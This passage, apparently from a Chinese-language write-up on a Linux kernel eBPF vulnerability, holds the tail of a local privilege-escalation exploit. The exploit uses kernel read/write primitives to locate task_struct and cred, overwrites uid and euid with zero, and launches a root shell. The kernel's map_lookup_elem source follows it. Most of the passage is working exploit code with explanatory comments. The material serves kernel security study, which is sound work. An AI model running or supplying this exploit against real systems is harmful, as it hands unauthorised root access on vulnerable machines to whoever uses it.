    
    sp = get_sp(fp); // 得到内核栈顶rsp地址
    if (sp < PHYS_OFFSET)
        __exit("bogus sp");
    
    task_struct = __read(sp); // 读出task_struct结构体的地址

    if (task_struct < PHYS_OFFSET)
        __exit("bogus task ptr");

    printf("task_struct = %lx\n", task_struct);

    credptr = __read(task_struct + CRED_OFFSET); // 读出task_struct中cred结构体的地址
    
    if (credptr < PHYS_OFFSET)
        __exit("bogus cred ptr");

    uidptr = credptr + UID_OFFSET; // 得到uid的地址
	    if (uidptr < PHYS_OFFSET)
		__exit("bogus uid ptr");
	  printf("uidptr = %lx\n", uidptr);
	  __write(uidptr, 0); // 将uid以及gid置为0，注意这里写入的值为64位，uid+gid = 64bytes

    euidptr = credptr + EUID_OFFSET;
	  if (euidptr < PHYS_OFFSET)
		  __exit("fake addr");
	  printf("euidptr = %lx\n", euidptr);
	  __write(euidptr,0);// 将euid以及egid置为0

    if (getuid() == 0 && geteuid() == 0) { // 此时该进程已经为root权限,注意在busybox环境下仅修改uid以及gid为0是无法提权的，在bash环境下则可以，详细可以看之后的文章
        printf("spawning root shell\n");
        system("/bin/sh"); // fork出“/bin/sh”，同样是root权限，提权成功
        exit(0);
    }

    __exit("not vulnerable?");
}

int main(int argc, char **argv) {
    prep();
    pwn();

    return 0;
}

另外贴一份注释中提到的BPF_MAP_LOOKUP_ELEM的实现

static int map_lookup_elem(union bpf_attr *attr)
{
    void __user *ukey = u64_to_ptr(attr->key);
    void __user *uvalue = u64_to_ptr(attr->value);
    int ufd = attr->map_fd;
    struct bpf_map *map;
    void *key, *value, *ptr;
    struct fd f;
    int err;

    if (CHECK_ATTR(BPF_MAP_LOOKUP_ELEM))
        return -EINVAL;

    f = fdget(ufd);
    map = __bpf_map_get(f);
    if (IS_ERR(map))
        return PTR_ERR(map);

    err = -ENOMEM;
    key = kmalloc(map->key_size, GFP_USER);
    if (!key)
        goto err_put;

    err = -EFAULT;
    if (copy_from_user(key, ukey, map->key_size) != 0)
        goto free_key;

    err = -ENOMEM;
    value = kmalloc(map->value_size, GFP_USER | __GFP_NOWARN);
    if (!value)
        goto free_key;

    rcu_read_lock();
    ptr = map->ops->map_lookup_elem(map, key); // 获得元素的指针
    if (ptr)
        memcpy(value, ptr, map->value_size); // 将元素值拷贝到内核value
    rcu_read_unlock();

    err = -ENOENT;
    if (!ptr)
        goto free_value;

    err = -EFAULT;
    if (copy_to_user(uvalue, value, map->value_size) != 0) // 将内核value的值拷贝到用户提供的用户态下的value值中
        goto free_value;

    err = 0;

free_value:
    kfree(value);
free_key:
    kfree(key);
err_put:
    fdput(f);
    return err;
}